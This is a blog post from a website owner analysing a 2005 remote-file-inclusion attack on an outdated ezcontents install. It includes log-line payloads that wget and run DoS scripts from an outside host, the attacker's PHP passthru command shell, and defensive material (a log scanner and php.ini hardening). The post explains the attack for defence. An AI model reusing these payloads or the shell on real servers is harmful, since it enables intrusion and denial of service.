More details on php exploit from last week



OK. I have a bit of time now to sit down and go into more detail about what happened late last week that shut the site down for a couple of days.

At some point I had updated the ezcontents script for the main site (averyjparker.com), but for about two years I had left a testbed install at averyjparker.com/ncgen2, where I was trying to set up a platform for an upgrade of the old genealogy site (www.averyjparker.com/ncgen; the new site is now at www.northcarolinagenealogy.net, linked at the top of the page). In searching through the logs, here are some of the entries that caught my attention.

63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:42 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"

I should preface this with a simple fact: there are a LOT of exploit attempts that show up in web server logs. Here's a sample of one…
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"

The first field is the IP address, then the datestamp, then the specific request (usually starting with POST or GET and ending with the version of the protocol). Next you see 404; that's the result code, and a 404 means the file wasn't found.

What troubled me about the suspicious entries is that the result code was 200 (file found) and they were passing various bits of information to a PHP file (/ncgen2//include/db.php) that did exist.
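As an added illustration (not code from the original post), here is a small Python scanner that parses combined-format lines like the ones above and flags the two things that made these entries stand out: a URL supplied where a path was expected and a command string in a parameter, along with whether the server answered 200. The sample lines, addresses and domain below are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines: one normal page view, one request shaped like the db.php hits above.
SAMPLE_LOG = """\
10.0.0.1 - - [14/Jul/2005:13:00:00 -0600] "GET /ncgen2/index.php?page=3 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://example.invalid/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://example.invalid/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0"
"""

def parse_line(line):
    """Split one combined-log line into named fields; None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def rfi_indicators(target):
    """List the reasons a request target looks like a remote file inclusion attempt."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.startswith("GLOBALS["):                # register_globals override of $GLOBALS
            reasons.append("globals_override:" + name)
        if re.match(r"(https?|ftp)://", value, re.I):  # a URL where a local path was expected
            reasons.append("remote_url:" + name)
        if re.search(r"(^|[;|&`])\s*(wget|curl|chmod|perl|sh|bash)\b", value):
            reasons.append("shell_command:" + name)    # command string for an injected shell
    return reasons

def scan_log(text):
    """Return one finding per log line carrying RFI indicators, noting whether it got a 200."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = rfi_indicators(entry["target"])
        if reasons:
            findings.append({
                "ip": entry["ip"], "time": entry["time"],
                "path": urlsplit(entry["target"]).path,
                "served": entry["status"] == "200",    # 200 means the included script existed
                "reasons": reasons,
            })
    return findings
```

A 200 on a flagged line is the one worth chasing; the 404s and 403s are the background noise the post describes.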

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load a file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file, by the way). It's basically an HTML file wrapped around this…
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
OK, so they're trying to inject this file, http://www.caniggiamatador.com/dos.pl, and http://www.caniggiamatador.com/perldos.pl.

I looked at the code there, and they were basically bash scripts that set up a denial of service attack on a specified target. Fairly clever, and commented in Portuguese or Spanish. I've actually spent some time studying Spanish, but there was a lot that was either misspelled or that I simply didn't understand.

The site is down now, by the way. It looks like it was hosted by http://www.internetters.net/, and I suspect my service provider dealt with contacting them.

Since I'm a fairly curious person, I was also interested in the IP address that was originating the requests, 200.174.133.132. An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I'm guessing a dialup (?) customer in Brazil, which might back up the comments being in Portuguese.

I, of course, sent what I found to my service provider. They thanked me for the time I'd spent researching the issue, verified that this was the file being exploited, and confirmed it was a DoS attack against their nameservers. They also sent along a couple of notes on changes to php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These changes were intended to prevent a future breach by the same method.
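As an added note, not part of the host's message: the php.ini directive is actually spelled disable_functions, `cmd` is not a PHP function (so listing it does nothing), and the remote include itself is controlled by a separate setting. A constructed fragment showing the weak settings beside hardened ones:

```ini
; Constructed example, not the provider's actual php.ini.

; Weak: include() will happily fetch http:// URLs, ?GLOBALS[...]= in the query
; string can overwrite server-side variables, and "cmd" is not a real function.
; allow_url_fopen = On
; register_globals = On
; disable_functions = cmd

; Hardened:
allow_url_fopen = Off       ; PHP 4/5: also stops include() from loading a remote URL
allow_url_include = Off     ; PHP 5.2+: blocks remote include() even when allow_url_fopen is On
register_globals = Off      ; default since PHP 4.2, removed in 5.4; stops the GLOBALS[rootdp] trick
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
```

Disabling the exec family limits what an injected shell can do; turning off remote includes and register_globals is what actually closes the hole the log shows.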

Some details of the exploit can be found here:
ezcontents code injection vulnerability

So, how did they find my site to attack? Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.
